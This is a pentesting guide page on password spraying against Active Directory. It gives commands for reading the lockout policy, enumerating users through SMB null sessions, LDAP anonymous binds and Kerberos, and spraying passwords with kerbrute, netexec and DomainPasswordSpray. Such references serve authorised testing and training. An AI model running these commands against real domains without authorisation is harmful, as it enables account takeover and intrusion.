Rednote
GuidebooksTerminalCode
  • Welcome!
  • Utility
    • General
    • Server
    • Transferring File
      • Main
      • Code
      • Miscellaneous
    • Reverse & Bind Shells
      • Havoc
    • Metasploit
    • Service
      • FTP (21)
      • SSH (22)
      • DNS (53)
      • HTTP/HTTPS (80-443)
      • SMTP (25-465-587)
      • POP3 (110-995)
      • IMAP (143-993)
      • MySQL (3306)
      • MSSQL (1433-2433)
      • SMB (139-445)
      • RDP (3389)
      • WinRM (5985-5986)
      • WMI (135)
      • LLMNR & NBT-NS (5355-137)
      • NFS (111-2049)
      • SNMP (161-162)
      • VNC (5900)
      • Rsync (873)
      • R-Service (512-513-514)
      • IPMI (623)
      • Oracle TNS (1521)
  • Pentesting Process
    • Information Gathering
      • Passive
      • Active
      • OSINT
    • Vulnerability
    • Web Attacks
      • GENERAL
      • Crawling/Spidering & Fuzzing
      • Information Disclosure
      • Command Injection
      • Unrestricted File Upload
      • File Inclusion/Path Traversal
      • Request Smuggling
      • Clickjacking
      • Web Cache Poisoning
      • Web Cache Deception
      • Insecure Deserialization
      • Prototype Pollution
      • OAuth 2.0
      • JWT
      • SQLi
        • sqlmap
      • NoSQLi
      • GraphQL
      • XSS
      • SSRF
      • XXE
      • IDOR
      • API
      • SSTI
      • CSRF
      • CORS
      • AJP
      • SSI
      • ESI
      • XSLT
      • Cloud
      • LLM Prompt Security
    • Software Attacks
      • Binary
      • Shellcode
      • AV Evasion & Obfuscation
    • Network Attacks
      • ARP Poisoning
      • Local DNS Cache Poisoning
      • Baby Local DoS
    • Crypto Attacks
      • Utility
      • RSA
      • DSA/DSS
      • PRNG
        • LGC
        • MT
        • LFSR
    • Misc Attacks
    • Social Engineering
    • Password Cracking
      • Wordlist
      • Offline
      • Online
    • Pivoting & Tunneling
    • Local Enumeration
      • Linux
      • Windows
    • Privilege Escalation
      • Linux
        • Linux Privilege Escalation with Groups
        • Linux Privilege Escalation with Library
      • Windows
        • Windows Privilege Escalation with Groups and Privileges
        • Windows Privilege Escalation with DLL Hijacking
    • Active Directory
      • Enumeration
      • Abuse ACL
      • Extract Hash & Password
      • Pass The Hash
      • Pass The Ticket
      • Overpass the Hash
      • Relay Attack
      • Password Spraying Attack
      • AS-REP Roasting
      • Kerberoasting
      • Silver Ticket
      • Golden Ticket
      • DC Synchronization
      • AD Certificates
      • Attacking Domain Trusts
    • Reports
      • Bug Bounty Report
    • CVE
      • Linux
      • Windows
    • OTHER
      • CMS
        • WordPress
        • Joomla
        • Drupal
      • Tomcat
      • Jenkins
      • Splunk
      • Web Service
      • Navigating Python Objects
      • JavaScript Deobfuscation
  • Extra
    • My Books
    • My Exploits
    • Compiled Binaries
Powered by GitBook
On this page
  • Policy Password
  • Locally
  • Remotely
  • Null Session SMB
  • LDAP Anonymous Binds
  • Find Usernames
  • Locally
  • Remotely
  • Null Session SMB
  • LDAP Anonymous Binds
  • Brute Force
  • Spraying Attack

Was this helpful?

  1. Pentesting Process
  2. Active Directory

Password Spraying Attack

Try single passwords on all users, less chance of lockout.

Policy Password

Important to obtain password policy, with:

Lockout threshold

Possible attempts before being blocked

Lockout duration

Duration of the block

Lockout observation window

After how long does the reset of attempts occur

Locally

net accounts
Get-ADDefaultDomainPasswordPolicy

Remotely

Tool
Details

nxc smb <IP> -u <USER> -p <PASS> --pass-pol

enum4linux -u <USER> -p <PASS> -P <IP>

Null Session SMB

Tool
Details

nxc smb <IP> --pass-pol

enum4linux -P <IP>

LDAP Anonymous Binds

Tool
Details

ex. INLANEFREIGHT.LOCAL ldapsearch -H ldap://<IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Find Usernames

Locally

net user /domain

Remotely

Tool
Details

nxc smb <IP> -u <USER> -p <PASS> --users

enum4linux -u <USER> -p <PASS> -U <IP>

Null Session SMB

Tool
Details

nxc smb <IP> --users

enum4linux -U <IP>

LDAP Anonymous Binds

Tool
Details

ex. INLANEFREIGHT.LOCAL ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "

windapsearch.py --dc-ip <IP> -u "" -U

Brute Force

Tool
Details

Spraying Attack

Tool
Details

This method is based on obtaining TGT for credential verification. The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response) kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS> Remove users who generate errors from wordlists.

This method uses the SMB protocol to verify credentials (more traffic and slower). nxc smb <IP> -u <USERS_LIST> -p <PASS1> <PASS2> -d <DOMAIN> --continue-on-success | grep +

From Windows, with the ability to extract the password policy itself (adapting the attack) and users if it is executed from hosts within the domain. Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password <PASS> -ErrorAction SilentlyContinue [-UserList <USERS> -Domain <DOMAIN>]

Last updated 1 month ago

Was this helpful?

Use to enumerate users via brute force (no login errors and no lockouts). kerbrute userenum -d <DOMAIN> --dc <IP_DC> <WORDLIST>

netexec
enum4linux
netexec
enum4linux
ldapsearch
netexec
enum4linux
netexec
enum4linux
ldapsearch
windapsearch
kerbrute
Kerberos Pre-Authentication
kerbrute
netexec
DomainPasswordSpray